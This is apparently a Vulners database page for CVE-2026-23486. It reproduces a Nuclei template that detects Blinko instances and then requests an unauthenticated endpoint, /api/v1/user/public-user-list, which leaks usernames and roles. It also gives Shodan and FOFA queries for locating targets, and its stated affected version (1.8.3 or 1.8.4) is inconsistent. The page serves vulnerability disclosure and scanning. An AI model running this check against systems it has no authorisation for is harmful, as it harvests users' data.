Lucene search
K

Blinko <= 1.8.3 - User Information Leak

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Blinko versions up to 1.8.3 expose user names, roles, and account creation dates via a public endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-23486
23 Mar 202620:42
attackerkb
Circl
CVE-2026-23486
28 Apr 202600:08
circl
CNNVD
Blinko 信息泄露漏洞
23 Mar 202600:00
cnnvd
CVE
CVE-2026-23486
23 Mar 202620:42
cve
Cvelist
CVE-2026-23486 Blinko: Unauthorized User Information Leak
23 Mar 202620:42
cvelist
EUVD
EUVD-2026-14541
23 Mar 202620:42
euvd
NVD
CVE-2026-23486
23 Mar 202621:17
nvd
OSV
CVE-2026-23486 Blinko: Unauthorized User Information Leak
23 Mar 202620:42
osv
Positive Technologies
PT-2026-27214
23 Mar 202600:00
ptsecurity
RedhatCVE
CVE-2026-23486
26 Mar 202615:11
redhatcve
Rows per page
id: CVE-2026-23486

info:
  name: Blinko <= 1.8.3 - User Information Leak
  author: 0x_Akoko
  severity: low
  description: |
    Blinko <= 1.8.4 contains an information disclosure caused by a publicly accessible endpoint exposing user information including usernames, roles, and account creation dates, letting remote attackers access sensitive user data, exploit requires no special privileges.
  impact: |
    Remote attackers can access sensitive user information, potentially leading to privacy violations and targeted attacks.
  remediation: |
    Update to version 1.8.4 or later.
  reference:
    - https://github.com/blinkospace/blinko/security/advisories/GHSA-446p-2xf5-frxf
    - https://github.com/blinkospace/blinko
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23486
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
    cve-id: CVE-2026-23486
    epss-score: 0.00711
    epss-percentile: 0.4901
  metadata:
    verified: true
    max-request: 1
    vendor: blinkospace
    product: blinko
    fofa-query: title="Blinko"
    shodan-query: http.title:"Blinko"
  tags: cve,cve2026,blinko,exposure,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "<title>Blinko</title>", "Blinko self-hosted personal note")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/api/v1/user/public-user-list"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"name\":", "\"role\":")'
        condition: and
# digest: 4a0a0047304502207989cc132f78bf4c664789a606664bb0c43bcea7adb1c7f9557ce5af83b83c86022100c67cf05d46e926f760e01735f2ad9b96117a3ce94283c97efeca0bc5955fb91b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2026 00:08Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3
CVSS 46.9
EPSS0.00711
SSVC
12